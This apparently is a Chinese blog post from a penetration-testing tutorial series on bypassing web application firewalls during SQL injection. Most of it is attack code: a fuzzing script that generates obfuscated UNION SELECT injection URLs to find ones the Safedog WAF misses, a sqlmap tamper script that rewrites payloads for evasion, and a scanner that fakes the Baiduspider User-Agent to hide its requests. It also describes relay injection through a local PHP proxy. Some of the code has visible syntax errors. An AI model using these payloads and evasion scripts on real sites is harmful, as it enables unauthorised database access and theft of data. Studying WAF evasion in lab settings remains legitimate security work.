SQL注入——WAF绕过(二)

SQL注入——WAF绕过(二)

0.前言

  对于WAF而言,需要形成一定的绕过体系与知识,才能很好的去针对这种情况的渗透,我们需要去自我一些脚本的知识来帮助我们进行攻击。

1.Fuzz绕过脚本

(来源:小迪安全)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import requests,time

url='http://127.0.0.1:8080/sqli/Less-2/?id=-1'
union='union'
select='select'
num='1,2,3'
a={'%0a','%23'}
aa={'x'}
aaa={'%0a','%23'}
b='/*!'
c='*/'
def bypass():
	for xiaodi in a:
		for xiaodis in aa:
			for xiaodiss in aaa:
				for two in range(44500,44600):
					urls=url+xiaodi+xiaodis+xiaodiss+b+str(two)+union+c+xiaodi+xiaodis+xiaodiss+select+xiaodi+xiaodis+xiaodiss+num
					#urlss=url+xiaodi+xiaodis+xiaodiss+union+xiaodi+xiaodis+xiaodiss+b+str(two)+select+c+xiaodi+xiaodis+xiaodiss+num
					try:
						result=requests.get(urls).text
						len_r=len(result)
						if (result.find('safedog')==-1):
							#print('bypass url addreess:'+urls+'|'+str(len_r))
							 print('bypass url addreess:'+urls+'|'+str(len_r))
						if len_r==715:
                             fp = open('url.txt','a+')
                             fp.write(urls+'\n')
                             fp.close()
					except Exception as err:
						print('connecting error')
						time.sleep(0.1)

if__name__=='__main__':
	print('fuzz strat!')
	bypass()

2.Payload脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
"""
Copyright(c)2006-2019sqlmapdevelopers(http://sqlmap.org/)
Seethefile'LICENSE'forcopyingpermission
"""

import os

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST


def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))


def tamper(payload, **kwargs):
    # %23a%0aunion/*!44575select*/1,2,3
    if payload:
        payload = payload.replace("union", "%23a%0aunion")
        payload = payload.replace("select", "/*!44575select*/")
        payload = payload.replace("%20", "%23a%0a")
        payload = payload.replace("", "%23a%0a")
        payload = payload.replace("database()", "database%23a%0a()")
    return payload

3.伪装百度的爬虫脚本

(搜索引擎爬虫 http 指纹头)

1
2
3
4
5
6
7
8
9
10
11
12
13
import json
import requests

url='http://192.168.0.103:8080/'

head={
	'User-Agent':'Mozilla/5.0(compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)'
}
for data in open('PH1P.txt'):
    data=data.replace('\n','')
    urls=url+data
    code=requests.get(urls.headers=head).status_code
    print(urls+'|'+str(code))

4.中转注入

      sqlmap注入本地的脚本地址——>本地搭建脚本(请求书包自定义编写)——>远程地址

  当受害者网站URL注入点是经过编码的,不能直接结合sqlmap进行漏洞利用,所以本地搭建一个网站,写一个php脚本编码文件,就可以结合sqlmap工具进行测试。

参考资源

=》涉及相关链接网址:
web
SQL注入——WAF绕过(二)
https://one-null-pointer.github.io/2022/08/29/SQL注入——WAF绕过(二)/
Author
liaoyue
Posted on
August 29, 2022
传送口